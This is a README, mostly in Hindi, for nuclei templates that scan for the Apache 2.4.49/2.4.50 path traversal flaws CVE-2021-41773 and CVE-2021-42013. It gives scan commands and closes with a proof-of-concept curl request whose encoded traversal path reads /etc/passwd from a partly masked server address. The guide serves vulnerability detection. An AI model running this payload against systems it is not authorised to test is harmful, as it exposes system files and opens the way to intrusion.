
Apache HTTP Server में पथ ट्रैवर्सल कमजोरियों (CVE-2021-41773, CVE-2021-42013) का पता लगाता है विभिन्न ट्रैवर्सल तकनीकों के माध्यम से /etc/passwd के एक्सपोज़र की जाँच करके।
Apache Version 2.4.49 and 2.4.50
(CVE-2021-41773) and (CVE-2021-42013)
आपको nuclei की आवश्यकता होगी !
https://github.com/projectdiscovery/nuclei
स्थानीय nuclei इंस्टॉल की जाँच करें और टेम्पलेट सत्यापित करें
nuclei -t apache-vulnerable-versions.yaml -vv
और
nuclei -t apache-path-traversal-rce-v2.yaml -vv
आपको देखना चाहिए
[apache-vulnerable-versions] Vulnerable Apache Versions (2.4.49-2.4.50) (@psibot) [high]
और
[apache-path-traversal-passwd] Apache Path Traversal - /etc/passwd Exposure (@psibot) [critical]
लक्ष्य को स्कैन करने के लिए :
nuclei --silent -t apache-vulnerable-versions.yaml -u https://*.*.*.*:port
फ़ाइल में लक्ष्यों को स्कैन करने के लिए :
nuclei --silent -t apache-vulnerable-versions.yaml -l hosts.txt
apache-vulnerable-versions.yaml - Apache के संस्करण का पता लगाता है और यदि संवेदनशील है तो HIGH आउटपुट देगा।

apache-path-traversal-rce-v2.yaml - एक एक्सप्लॉइट चलाएगा और संवेदनशील पथ दिखाएगा। यदि संवेदनशील है तो CRITICAL आउटपुट देगा।

POC :
curl -s -k https://135.*.120.*:8443/icons/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
